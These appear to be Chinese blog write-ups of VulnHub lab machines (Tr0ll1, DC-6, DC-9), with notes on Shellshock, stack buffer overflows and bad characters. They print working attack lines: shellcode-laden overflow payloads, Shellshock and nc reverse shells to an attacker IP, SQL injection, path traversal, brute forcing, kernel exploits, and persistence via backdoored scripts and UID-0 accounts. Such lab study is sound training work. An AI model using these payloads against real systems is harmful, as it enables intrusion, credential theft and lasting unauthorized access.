\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")')
2x/256x $esp 
3x/256b $esp

\x00本身就是坏字符，\x09 \x0a \x20这三个逐个去掉后找出，完全去掉后就连续了，就没有坏点了，说明坏字符为：x00\x0a\x09\x20

用坏字符生成payload，然后用命令加载即可。

1msfvenom -a x86 -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a\x20' -e x86/shikata_ga_nai -fc
2
3./r00t $(python -c 'print ("A"*268 + "\x80\xfb\xff\xbf" + "\x90"*20 + "\xba\xa0\x03\xb5\x23\xda\xc8\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x0b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x55\x69\xbe\x7b\x0c\x3c\xa6\x13\x03\xa2\xaf\x03\x33\x0b\xc3\xa3\xc3\x3b\x0c\x56\xaa\xd5\xdb\x75\x7e\xc2\xd4\x79\x7e\x12\xca\x1b\x17\x7c\x3b\xaf\x8f\x80\x14\x1c\xc6\x60\x57\x22")')

这个靶场开始有难度了，涉及到一些内存的知识点。我对这部分知识也不太了解，很多不会的地方我询问了AI，安全学习是一个庞杂的方向，需要触类旁通。

补充知识点：CVE-2014-6271 （Shellshock 漏洞）

漏洞原理

根本原因：Bash 在处理环境变量时，未正确验证以 () { 开头的函数定义字符串，导致后续命令被意外执行。
影响范围：Bash 版本 1.14 ~ 4.3（2014年9月前的版本）。
典型场景：Web服务器（如Apache CGI）、DHCP客户端、SSH守护进程等通过环境变量调用Bash的场景。

漏洞检测

方法 1：本地检测

1env x='() { :;}; echo VULNERABLE' bash -c "echo Testing"

安全输出：无反应或报错。
存在漏洞：输出 VULNERABLE 和 Testing。

方法 2：远程检测（针对Web CGI）

1curl -A "() { :;}; echo VULNERABLE" http://target/cgi-bin/test.cgi

若返回 VULNERABLE，则存在漏洞。

漏洞利用方法

场景 1：通过HTTP请求（Apache CGI）

假设目标服务器存在 /cgi-bin/status.cgi（或其他CGI脚本）：

执行任意命令：

1curl -H "User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'" http://target/cgi-bin/status.cgi

通过修改 User-Agent、Cookie 或 Referer 头注入命令。

反弹Shell：

1curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/攻击者IP/4444 0>&1" http://target/cgi-bin/status.cgi

在攻击机监听端口：

1nc -lvnp 4444

场景 2：DHCP客户端攻击

如果目标作为DHCP客户端且使用受漏洞影响的Bash：

攻击者可伪造DHCP服务器，在分配IP时注入恶意环境变量。

场景 3：SSH强制命令

若目标允许通过SSH公钥认证并配置了强制命令（如 command="example"）：

1ssh -i id_rsa user@target '() { :;}; /bin/bash -i >& /dev/tcp/攻击者IP/4444 0>&1'

自动化利用工具

1. Metasploit

1msf6 > use exploit/multi/http/apache_mod_cgi_bash_env
2msf6 > set RHOSTS <目标IP>
3msf6 > set TARGETURI /cgi-bin/status.cgi
4msf6 > set PAYLOAD linux/x86/shell/reverse_tcp
5msf6 > set LHOST <攻击者IP>
6msf6 > exploit

2. Python EXP脚本

1import requests
2
3url = "http://target/cgi-bin/status.cgi"
4headers = {
5"User-Agent": "() { :;}; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 攻击者IP 4444 >/tmp/f'"
6}
7requests.get(url, headers=headers)

补充知识点：缓冲区溢出漏洞

技术背景

strcpy 的作用：将源字符串复制到目标缓冲区，不检查目标缓冲区长度，可能导致缓冲区溢出（Buffer Overflow）。
漏洞场景：如果目标缓冲区（如栈上的字符数组）较小，而源字符串过长，strcpy 会覆盖栈上的返回地址（或其他关键数据），导致程序崩溃或被控制流劫持。

调试中如何观察

查看函数上下文 输入 disas 或 disassemble 反汇编当前函数，观察 strcpy 调用前后的逻辑：

1(gdb) disas main

检查参数传递

在 call strcpy 前，参数通过栈传递（x86架构）或寄存器传递（x86-64架构）。
例如，在 x86 中，参数按从右到左顺序压栈：

1push 源字符串地址 ; 第二个参数（src）
2push 目标缓冲区地址 ; 第一个参数（dest）
3call strcpy

设置断点 在 strcpy 调用前设置断点，观察内存状态：

1(gdb) break *0x0804848b ; 在调用 strcpy 的地址处断点
2(gdb) run ; 运行程序
3(gdb) info registers ; 查看寄存器值（如 ESP、EBP）
4(gdb) x/8wx $esp ; 查看栈内容（x86）

漏洞利用示例

假设目标缓冲区在栈上且无长度检查：

1char buffer[64];
2strcpy(buffer, 用户输入); // 用户输入超过 64 字节会导致溢出

覆盖返回地址 构造输入字符串，覆盖栈上的返回地址为恶意代码地址（如 Shellcode）。
利用工具 使用 Python 或 pwntools 生成 payload：

1payload = b'A' * 64 # 填充缓冲区
2payload += b'BBBB' # 覆盖 EBP
3payload += p32(0xdeadbeef) # 覆盖返回地址

在 GDB 中验证 输入超长字符串，观察程序崩溃时的寄存器值：

1(gdb) run < payload.txt
2Program received signal SIGSEGV, Segmentation fault.
3eip = 0xdeadbeef ; 返回地址被成功覆盖

防御与修复

替换安全函数 使用 strncpy 或 snprintf 替代 strcpy，并明确限制长度：

1strncpy(buffer, src, sizeof(buffer)-1);
2buffer[sizeof(buffer)-1] = '\0';

编译选项 启用栈保护（Stack Canary）和地址随机化（ASLR）：

1gcc -fstack-protector -pie -fPIE -o program program.c

攻击命令结构

1./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90"*20 + "<shellcode>"')

该命令生成的输入字符串分为四部分：

"A"\*268：填充缓冲区到返回地址前的偏移。
"\x80\xfb\xff\xbf"：覆盖栈上的返回地址，指向 NOP雪橇 或 shellcode。
"\x90"\*20：NOP雪橇（滑板指令），提高 shellcode 命中率。
<shellcode>：恶意机器码（如启动 /bin/sh 的代码）。

逐部分详解

**1. 填充字符（“A”*268）**

作用：覆盖从缓冲区起始位置到返回地址之间的空间。
长度计算：通过动态调试（如 GDB）确定缓冲区到返回地址的偏移。假设缓冲区大小为 256 字节，加上保存的 EBP（4 字节），总偏移为 256 + 4 = 260 字节。若实际测试中发现需要 268 字节，可能是栈对齐或其他变量影响。

2. 覆盖返回地址（"\x80\xfb\xff\xbf"）

目标地址：0xbffffb80（小端序，实际字节为 \x80\xfb\xff\xbf）。
含义：
该地址指向栈上的某个位置（可能是 NOP雪橇 或 shellcode 起始处）。
在关闭 ASLR 的系统中，栈地址通常固定（如 0xbffffxxx）。

**3. NOP雪橇（"\x90"*20）**

作用：
\x90 是 NOP（No Operation）指令，执行时不进行任何操作，程序计数器（EIP）会继续向后移动。
增加 NOP雪橇 的长度可提高命中率，即使返回地址略微偏差，仍可能滑入 shellcode。

4. Shellcode

代码内容：

 1xor eax, eax ; \x31\xc0 (清空 eax)
 2push eax ; \x50 (压入字符串终止符 \x00)
 3push 0x68732f2f ; \x68\x2f\x2f\x73\x68 ("//sh")
 4push 0x6e69622f ; \x68\x2f\x62\x69\x6e ("/bin")
 5mov ebx, esp ; \x89\xe3 (ebx 指向 "/bin//sh")
 6push eax ; \x50 (argv[1] = NULL)
 7push ebx ; \x53 (argv[0] 指向 "/bin//sh")
 8mov ecx, esp ; \x89\xe1 (ecx 指向 argv)
 9mov al, 0xb ; \xb0\x0b (syscall 号 11: execve)
10int 0x80 ; \xcd\x80 (触发系统调用)

功能：调用 execve("/bin//sh", argv, NULL)，启动一个交互式 shell。

攻击流程

溢出缓冲区：通过输入字符串覆盖栈上的返回地址。
劫持 EIP：程序返回时跳转到 0xbffffb80（指向 NOP雪橇）。
滑入 Shellcode：CPU 执行 NOP 指令，直到命中 shellcode。
执行恶意代码：shellcode 启动 /bin/sh，攻击者获得 shell 控制权。

依赖条件

栈可执行（DEP 关闭）：现代系统默认启用数据执行保护（DEP），需目标程序编译时关闭该保护（gcc -z execstack）。
ASLR 关闭：地址空间随机化会使得栈地址不可预测，需在测试环境中关闭：

1echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

准确的偏移计算：需通过调试确定填充长度和返回地址位置。

调试验证步骤

确定偏移量：

1# 生成测试字符串
2python -c 'print "A"*268 + "BBBB" + "C"*100' > payload
3# 在 GDB 中运行
4gdb ./r00t
5(gdb) run < payload
6# 观察崩溃时 EIP 是否为 0x42424242（"BBBB"）

定位 Shellcode 地址：

1(gdb) run < <(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90"*20 + "shellcode"')
2(gdb) x/32wx $esp # 查看栈内容，确认 NOP 和 shellcode 位置

防御措施

启用 DEP/XN 位：阻止栈上代码执行。
启用 ASLR：随机化内存布局。
使用安全函数：替换 strcpy 为 strncpy 或 snprintf。
栈保护（Stack Canary）：检测缓冲区溢出

补充知识点：坏字符

在缓冲区溢出攻击的调试过程中，你提供的命令用于检查内存布局和验证攻击载荷（payload）是否正确覆盖目标区域。以下是详细解析：

1. 构造的 Payload 分析

1(gdb)
2r $(python -c 'print("A"*268 + "B"*4 + "\x01\x02\x03\x04...\xff")')

"A"\*268：填充到返回地址前的偏移（假设覆盖返回地址需要 268 字节）。
"B"\*4：覆盖返回地址的测试值（0x42424242，即 ASCII “BBBB”）。
\x01\x02\x03...\xff：覆盖返回地址后的内存区域，包含所有可能的单字节值（0x01~0xff）。

2. `x/256x $esp` 和 `x/256b $esp` 的作用

这两个 GDB 命令用于检查内存内容，但输出格式不同：

(1) `x/256x $esp`

作用：以 十六进制四字节字（word） 显示栈顶（$esp 指向的地址）开始的 256 个 word（即 256×4=1024 字节）。
快速查看大范围内存布局（如返回地址、栈帧结构）。
确认 "B"*4（0x42424242）是否覆盖到预期的返回地址位置。
观察后续数据（\x01\x02\x03...）是否连续写入内存。

(2) `x/256b $esp`

作用：以 单字节（byte） 显示栈顶开始的 256 个字节。
精确检查每个字节的值，识别坏字符（Bad Characters）。
验证输入数据是否被篡改（如某些字符被过滤或截断）。
确认内存中的字节顺序（是否与输入顺序一致）。

3. 关键检查项

(1) 验证返回地址覆盖

在x/256x $esp的输出中，搜索``0x42424242`。
如果找到，说明 "B"*4 成功覆盖返回地址。
如果未找到，需重新计算偏移量（调整 "A"*268 的长度）。

(2) 检测坏字符

坏字符（Bad Characters）：某些字节（如 \x00、\x0a、\x0d）可能导致输入被截断或程序崩溃。
检查方法：

在 x/256b $esp 的输出中，从 0x01 开始逐字节对比输入和内存中的值。
若某个字节在内存中缺失或值改变（如 0x09 变为 0x20），则该字节为坏字符。
在构造 Shellcode 时需避免使用坏字符。

(3) 观察内存连续性

确认输入数据（\x01\x02\x03...）是否完整且顺序正确。
如果发现数据断裂或顺序错乱，可能因栈溢出破坏其他变量或指针。

4. 示例输出分析

假设执行 x/16x $esp 输出：

10xbffffb80: 0x41414141 0x41414141 0x41414141 0x42424242
20xbffffb90: 0x03020100 0x07060504 0x0b0a0908 0x0f0e0d0c
3...

覆盖验证：地址 0xbffffb8c 处值为 0x42424242，说明返回地址被正确覆盖。
数据连续性：后续数据 0x03020100 对应输入 \x00\x01\x02\x03（注意小端序）。

若执行 x/16b $esp 输出：

10xbffffb80: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
20xbffffb88: 0x41 0x41 0x41 0x41 0x42 0x42 0x42 0x42
3...

字节验证：输入 "A"（0x41）和 "B"（0x42）正确写入内存。

5. 渗透测试中的应用

偏移量校准：通过多次运行和观察内存，调整 "A"*N 的长度，确保返回地址精准覆盖。
坏字符列表生成：记录所有被篡改的字节，构建 BadChars = \x00\x09\x0a...。
Shellcode 适配：使用编码器（如msfvenom）生成不含坏字符的 Shellcode：

1msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a' -f python

总结

x/256x $esp：用于快速观察内存布局，验证大范围数据覆盖。
x/256b $esp：用于精细检查字节级数据，识别坏字符和输入篡改。
在渗透测试中，这两个命令是调试缓冲区溢出漏洞的 核心工具，帮助确认攻击载荷的有效性和可靠性。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day13 Tr0ll1 靶场WP

Fri, 16 May 2025 11:29:27 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Tr0ll: 1

靶场地址：https://www.vulnhub.com/entry/tr0ll-1,100/

信息收集

1sudo arp-scan -l 
2nmap -sS -sV -A -T5 -p- 172.168.169.140

1| http-robots.txt: 1 disallowed entry 
2|_/secret

这个输出提示，有一个不让机器人爬虫爬取的目录secret，越不让看什么越要看，看了就一个图片，还不如不看。

1|_End of status
2| ftp-anon: Anonymous FTP login allowed (FTP code 230)
3|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]

这个输出提示，ftp有一个可以匿名访问的文件，lol.pcap

1ftp 172.168.169.140
2ftp> user anonymous
3ftp> ls
4ftp> get lol.pcap

抓包分析

用Day12 Kali渗透工具Powercat和Wireshark、tcpdump 介绍的工具打开流量包分析

1tshark -r lol.pcap -T fields -e ip.dst | sort | uniq -c | sort -nr | head
2sudo tcpdump -n -r lol.pcap| awk -F" " '{print $5}' | sort | uniq -c | head 
3sudo tcpdump -n -r lol.pcap| awk -F" " '{print $3}' | sort | uniq -c | head

可以看到21端口的请求数量较多，而且结合前面nmap的扫描结果来看，应该是有尝试多次登录ftp。所以就单独把21端口提出来看一下。

sudo tcpdump -n port 21 -r lol.pcap

然后发现了一个奇怪的txt文件。

1sudo tcpdump -n -X -v -r capture.pcap tcp # 筛选所有tcp的流量

单独把重要信息的端口的内容解析出来。

1tshark -r lol.pcap -Y "tcp.port == 51884" -T fields -e tcp.payload | xxd -r -p

网页目录信息收集

这里一开始的sup3rs3cr3tdirlol我没反应过来是什么，用AI翻译，AI自动识别位超级秘密目录，是把3看做e的做法，是英语中常见的作法。

下载后查看似乎是个二进制文件。

1wget http://172.168.169.140/sup3rs3cr3tdirlol/roflmao

提示找到0x0856BF地址继续，我们继续在网页中中找这个目录。

SSH密码爆破

找到似乎是用户名和密码的两个文件，推测是ssh密码，复制后用hydra爆破。

1hydra -L user.txt -P pass.txt 172.168.169.140 ssh -v
2wget http://172.168.169.140/0x0856BF/this_folder_contains_the_password/Pass.txt

这里作者开了个玩笑，密码不是Good_job_:)也不是Good_job_，而是文件名Pass.txt。所以用-p用一个密码字段爆破，即当前文件名，而不是-P指定密码文件爆破。

得到用户名overflow和密码Pass.txt，用ssh登录即可。

1ssh overflow@172.168.169.140

我们可以得到两个信息，一个是上一次登录是2014年从10.0.0.12登录的，所以这台靶机在流量包中的地址应该是10.0.0.6，第二个信息是，登陆后限时3分钟的操作。

内网信息收集和提权

好在只是限时3分钟，没有限制失败一次后不能在登陆。我们手速快一点是没问题的。首先收集以下内核信息。

1$ uname -a
2Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
3$ lsb_release -a
4No LSB modules are available.
5Distributor ID: Ubuntu
6Description: Ubuntu 14.04.1 LTS
7Release: 14.04
8Codename: trusty

观察到Ubuntu版本比较老，所以可以尝试用老版本内核漏洞提权。

1searchsploit Ubuntu 14.04 3.13.0
2searchsploit -m linux/local/37292.c

下载后，传到靶机编译后执行即可，由于有时长限制，我们先把要用到的脚本准备好。攻击机kali开启http服务。

1python3 -m http.server

1cd /tmp
2wget http://172.168.169.128:8000/37292.c
3gcc -o exp 37292.c 
4./exp

刚好在断网前拿到权限。如果是在真实过程中，拿到root权限后可以想办法把这个3分钟限制关掉，或者简历新的不限时的新账户用于持续攻击和横向移动。

建立保活稳定持续的后门

1find / -name cronlog 2>/dev/null
2cat /var/log/cronlog
3find / -name cleaner.py 2>/dev/null
4cat /lib/log/cleaner.py

可以看到这里可以得知系统会每 2 分钟执行一次 cleaner.py 脚本。脚本内容就是清楚tmp目录下的东西。抓紧时间把这个删除的脚本改掉。

但是负责给我们断网的脚本应该还在别处。可以通过以下命令排查，先全部执行完，再一个个分析。

1echo $TMOUT
2cat /etc/ssh/sshd_config
3grep -Ri "pam_time.so" /etc/pam.d
4grep -Ri "timeout\|kill.*ssh" /etc/cron.*
5grep -Ri "clean" /etc/cron.*
6cat /etc/update-motd.d/*

echo $TMOUT没有输出，表示不是通过这个变量来限制时长的。

 1$ cat /etc/ssh/sshd_config
 2# Package generated configuration file
 3# See the sshd_config(5) manpage for details
 4
 5# What ports, IPs and protocols we listen for
 6Port 22
 7# Use these options to restrict which interfaces/protocols sshd will bind to
 8#ListenAddress ::
 9#ListenAddress 0.0.0.0
10Protocol 2
11# HostKeys for protocol version 2
12HostKey /etc/ssh/ssh_host_rsa_key
13HostKey /etc/ssh/ssh_host_dsa_key
14HostKey /etc/ssh/ssh_host_ecdsa_key
15HostKey /etc/ssh/ssh_host_ed25519_key
16#Privilege Separation is turned on for security
17UsePrivilegeSeparation yes
18
19# Lifetime and size of ephemeral version 1 server key
20KeyRegenerationInterval 3600
21ServerKeyBits 1024
22
23# Logging
24SyslogFacility AUTH
25LogLevel INFO
26
27# Authentication:
28LoginGraceTime 120
29PermitRootLogin without-password
30StrictModes yes
31
32RSAAuthentication yes
33PubkeyAuthentication yes
34#AuthorizedKeysFile %h/.ssh/authorized_keys
35
36# Don't read the user's ~/.rhosts and ~/.shosts files
37IgnoreRhosts yes
38# For this to work you will also need host keys in /etc/ssh_known_hosts
39RhostsRSAAuthentication no
40# similar for protocol version 2
41HostbasedAuthentication no
42# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
43#IgnoreUserKnownHosts yes
44
45# To enable empty passwords, change to yes (NOT RECOMMENDED)
46PermitEmptyPasswords no
47
48# Change to yes to enable challenge-response passwords (beware issues with
49# some PAM modules and threads)
50ChallengeResponseAuthentication no
51
52# Change to no to disable tunnelled clear text passwords
53#PasswordAuthentication yes
54
55# Kerberos options
56#KerberosAuthentication no
57#KerberosGetAFSToken no
58#KerberosOrLocalPasswd yes
59#KerberosTicketCleanup yes
60
61# GSSAPI options
62#GSSAPIAuthentication no
63#GSSAPICleanupCredentials yes
64
65X11Forwarding yes
66X11DisplayOffset 10
67PrintMotd no
68PrintLastLog yes
69TCPKeepAlive yes
70#UseLogin no
71
72#MaxStartups 10:30:60
73#Banner /etc/issue.net
74
75# Allow client to pass locale environment variables
76AcceptEnv LANG LC_*
77
78Subsystem sftp /usr/lib/openssh/sftp-server
79
80# Set this to 'yes' to enable PAM authentication, account processing,
81# and session processing. If this is enabled, PAM authentication will
82# be allowed through the ChallengeResponseAuthentication and
83# PasswordAuthentication. Depending on your PAM configuration,
84# PAM authentication via ChallengeResponseAuthentication may bypass
85# the setting of "PermitRootLogin without-password".
86# If you just want the PAM account and session checks to run without
87# PAM authentication, then enable this but set PasswordAuthentication
88# and ChallengeResponseAuthentication to 'no'.
89UsePAM yes

KeyRegenerationInterval 3600作用：SSHv1 服务器密钥的重新生成时间间隔（单位：秒）。默认每 3600 秒（1小时） 重新生成一次密钥。注意：SSHv1 已过时且不安全，建议禁用 SSHv1 协议（现代系统默认使用 SSHv2）。这个如果是之后用密钥连接服务器的话，要注释掉这一行。不然一个小时后就要重新用密钥再次注册。

1$ grep -Ri "pam_time.so" /etc/pam.d
2/etc/pam.d/su:# account requisite pam_time.so
3/etc/pam.d/login:# account requisite pam_time.so

虽然有这两个预留的，但是#表示这两行没有生效。

观察每次登录后被断开的时间发现，无论我们什么时候登录，断开时间总是恰好在5，10的倍数时候断开，所以猜测是crontab中运行的每5分钟一次的脚本。

1crontab -l 
2cat /opt/lmao.py

查看lmao.py发现就是这个脚本每5分钟把overflow的登录会话关闭掉。如果我们想要获得稳定的ssh会话，只要把pkil那一行删掉即可。

1# cat /opt/lmao.py
2#!/usr/bin/env python
3import os
4
5os.system('echo "TIMES UP LOL!"|wall')
6os.system('pkill -u overflow')
7sys.exit()

这样虽然还是会发广播，但是广播之后我们的会话不会掉了。或者改为反弹shell，我们在kali上监听即可。

我们还可以新建一个全新的账户，拥有root权限，这样这个lmao.py也管不着我们了。但是这个靶机似乎限制了不让新建用户。

我们还可以暴力搜索这两行字是从哪个文件出来的，用时较长。

sudo grep -rnw '/' -e 'somewhere' --exclude-dir={proc,sys,dev,run} 2>/dev/null
sudo grep -rnw '/' -e 'TIMES UP LOL!' --exclude-dir={proc,sys,dev,run} 2>/dev/null

补充知识点：字母混淆

以下是更多通过 字母数字混淆（Leet Speak 或 1337 语）生成的趣味性隐藏词组示例，适用于密码、文件夹名、代码变量等场景：

基础替换规则

字母	常见替换字符
A/a	4, @, ^
B/b	8, 6
E/e	3, €
G/g	6, 9
I/i	1, !,
O/o	0, ()
S/s	5, $
T/t	7, +

示例列表

1. 简单数字替换

“backup folder” → b4ckupf0ld3r
“private data” → pr1v4t3d4t4
“admin tools” → 4dm1nt00l5

2. 符号混合替换

“security logs” → $3cur1tyl0g$
“confidential” → c0nf1d3n7!4l
“hacker zone” → h4ck3rz0n3

3. 复杂混淆（符号+大小写）

“top secret project” → 7()p$3cr37pr0j3c7
“system files” → $y$73mF!l3$
“encryption key” → 3ncrYP710nK3y!

4. 幽默短语

“delete this later” → d3l3737h!zl4t3r
“do not open” → d0N()70p3n!!
“trust no one” → 7ru$7n00n3

5. 网络文化梗

“hello world” → h3ll0w0r1d
“lol no way” → 101n0w4y
“yeet archive” → y3374rch!v3

进阶技巧

随机大小写：

p4SsW0rD（password）
AdM!n_P4n3l（admin panel）

插入冗余字符：

s3cr3t!!1!（结尾的 !!1! 模仿打字错误）
f0ld3r~#（添加无意义符号）

拆分单词：

d4t4_b4s3（database）
l0g_5t0r4g3（log storage）

实际应用场景

隐藏文件夹名

将 secret_docs 改为 $3cr37_d0x

生成强密码

M@st3rK3y!2024（原词：MasterKey）

代码变量名

u53r_1nput（user input）

借助AI能帮我们快速识别类似的英语文化的短语，弥补我们英语的不足。

补充知识点：新建与root相同权限的用户

在 Ubuntu 14 中，若需要新建一个与 root 拥有相同权限的账户，可以通过以下方法实现。（注意：赋予普通用户 root 权限存在安全风险，请谨慎操作！）

方法 1：将用户加入 `sudo` 组（推荐）

这是最安全的做法，用户可以通过 sudo 临时获得 root 权限。

步骤

创建用户：

1sudo adduser newadmin # 交互式创建用户，设置密码等信息

将用户加入 sudo 组：

1sudo usermod -aG sudo newadmin

验证权限：

1su - newadmin # 切换到新用户
2sudo -i # 测试获取 root shell

方法 2：直接赋予用户 `root` 权限（UID=0）

将用户的 UID 改为 0，使其等同于 root 用户。（危险！此操作会绕过权限控制，慎用！）

步骤

创建用户：

1sudo useradd -m -s /bin/bash newroot # 创建用户并生成主目录

修改用户 UID 为 0：

1sudo usermod -u 0 newroot

设置密码：

1sudo passwd newroot # 设置新用户的密码

验证权限：

1su - newroot # 切换到新用户
2whoami # 应显示 "root"

验证用户权限

1# 检查用户组
2groups newadmin
3
4# 检查 sudo 权限
5sudo -lU newadmin
6
7# 检查 UID（若使用方法2）
8id newroot # 应显示 uid=0(root)

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day10 DC-6、DC-9靶场WP

Wed, 07 May 2025 16:14:33 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

DC-6

靶场文件下载地址： https://download.vulnhub.com/dc/DC-6.zip

信息收集

sudo arp-scan -l
nmap -sS -sV -A -T5 -p- 172.168.169.132
dirsearch -u http://wordy/ -i 200

只有22，80端口开放，从80端口的扫描结果看，页面重定向到了Wordy的一个域名（也不是真域名），我们要改一下Host文件才能正常解析。

修改host文件，末尾添加这行才能正常解析。

打开网页是一个典型的WordPress默认界面，这是个博客CMS系统，一般有很多漏洞，而且应该有管理员登录地址，后台应该还存在一个数据库用于储存博客文章。

扫描目录发现admin的地址，在登录页面尝试重置密码失败，提示没有启动邮件服务。

有一个页面泄露了信息。curl一下发现存在目录遍历，用脚本把能下载的数据都拖下来分析一下。

1curl -I http://wordy/wp-includes/
2
3wget --recursive --no-parent --convert-links --random-wait \
4 --limit-rate=100k --user-agent="Mozilla/5.0" \
5 --execute robots=off --no-check-certificate \
6 http://wordy/wp-includes/

但是所有的php文件都是下载失败，下载成功的txt文件没有什么收获。

1curl -s http://wordy/wp-includes/.git/HEAD
2curl -s http://wordy/wp-includes/.svn/entries

尝试寻找git泄露和svn泄露也失败了。

密码爆破

这里根据官网提示，密码在rokyou.txt 文件中，然后用kali自带的专门的针对word press的工具WPscan来爆破密码。

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt # 靶机官网给的提示密码
wpscan --url http://wordy -e u # 扫描可能存在的用户名
wpscan --url http://wordy -U user.txt -P passwords.txt

提示存在上面5个用户名，保存成user.txt然后用密码表爆。

1[SUCCESS] - mark / helpdesk01

看到爆破成功的密码。

WP漏洞

用密码登录

可以看到插件管理页面有个IP tools，可以ping IP，然后执行命令。

Kali本地开启4444监听 nc -lvp 4444。

1127.0.0.1|nc 172.168.169.128 4444 -e /bin/bash

Burp抓包修改字段，反弹Shell。

1python -c "import pty;pty.spawn('/bin/bash')"

获取稳定的交互式shell，查找服务器文件，发现home下有各个账户的文件夹，Jens目录下有个打包整个网站的脚本，这样我们就可以下载整个网页源码用于分析。

而Mark文件夹下有个待办清单，里面提示了新建了一个graham账户，密码是 GSo7isUM1D4 已完成。

成功用密码登录graham的ssh。

1ssh graham@172.168.169.132

提权

find / -perm -u=s -type f 2>/dev/null
sudo -l

查看sudo -l 下的内容，发现有jens用户权限执行的脚本，正是刚才我们刚才看见的shell脚本。还提示了不用密码就可以执行，所以我们把弹shell的脚本写进去，用jens去做sudu，应该能弹回jens权限的shell。

1echo "nc 172.168.169.128 4444 -e /bin/bash" >> backups.sh 
2sudo -u jens /home/jens/backups.sh

限制登录了jens的终端，但是还是没有root。老样子，查看一下sudo -l

用nmap打开一个写了后门的nse文件，应该就能提权。

1echo 'os.execute("/bin/sh")' >getshell.nse
2sudo nmap --script=getshell.nse

其他

用jens扫搞nmap命令，想着一句话进root但是失败了，偶然扫出来有mysql端口，所以说，WordPress是一定有数据库的，一开始没扫出来可能是因为关闭的开放权限。既然，来都来了，顺手搞一下数据库。

1nmap -p3306 -sV --script=mysql-info 127.0.0.1

1 scp -P 22 ./Downloads/KaliLearn/fscan graham@172.168.169.132:/home/graham

用scp命令把fscan工具传上去扫一下，后面听说数据库加密的挺横就放弃了，以后再想办法

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

DC-9

靶场文件下载地址：https://download.vulnhub.com/dc/DC-9.zip

信息收集

扫描发现靶机地址为133

打开浏览器看一眼80端口有没有网页，可以看到有apache

扫一遍端口也只发现有80端口可以利用，22端口开放但是目前是关闭状态。

查看网页发现有如下界面，非常明显的提示，可能存在sql注入。

手动注入万能密码发现存在注入

11' or 1=1#

抓包使用sql注入

sql注入

1sqlmap -u "http://172.168.169.133/results.php" --data "search=1" --dbs
2sqlmap -u "http://172.168.169.133/results.php" --data "search=1" -D users --tables
3sqlmap -u "http://172.168.169.133/results.php" --data "search=1" -D users -T UserDetails --columns
4sqlmap -u "http://172.168.169.133/results.php" --data "search=1" -D users -T UserDetails -C “id,username,password,firstname,lastname,reg_date” --dump

但是这几个密码登陆不了，再看看别的表。

1sqlmap -u "http://172.168.169.133/results.php" --data "search=1" -D Staff -T "StaffDetails,Users" --dump

爆出来一个admin用户名和密码这个加密已经自动解出了是transorbital1

管理员的界面多了一个添加记录的功能，但是我们发现左下角有个文件不存在的提示，说明这个网页是解析了一个什么文件，但是靶机文件不存在。网页应该用了文件包含文件解析之类的功能，先尝试一下文件包含漏洞。

文件包含

1http://172.168.169.133/addrecord.php/?file=../../../../../etc/passwd

然后查询ssh的22端口的开门密码，因为原来的22的关闭状态，虽然有这个服务，但是端口没开。开门密码就是把这个端口给打开的一个作用

1http://172.168.169.133/addrecord.php/?file=../../../../../etc/knockd.conf

敲门打开ssh

1 nc -v -w 1 172.168.169.133 7469
2 nc -v -w 1 172.168.169.133 8475
3 nc -v -w 1 172.168.169.133 9842

敲完门发现ssh打开了。

hydra密码爆破

把之前sqlmap爆出来的表格中用户名和密码单独存为user.txt和passwd.txt。这个表格在/home/kali/.local/share/sqlmap/output/172.168.169.133/dump/users/UserDetails.csv

1hydra -L user.txt -P passwd.txt ssh://172.168.169.133

然后用hydra带上用户名和密码爆破。

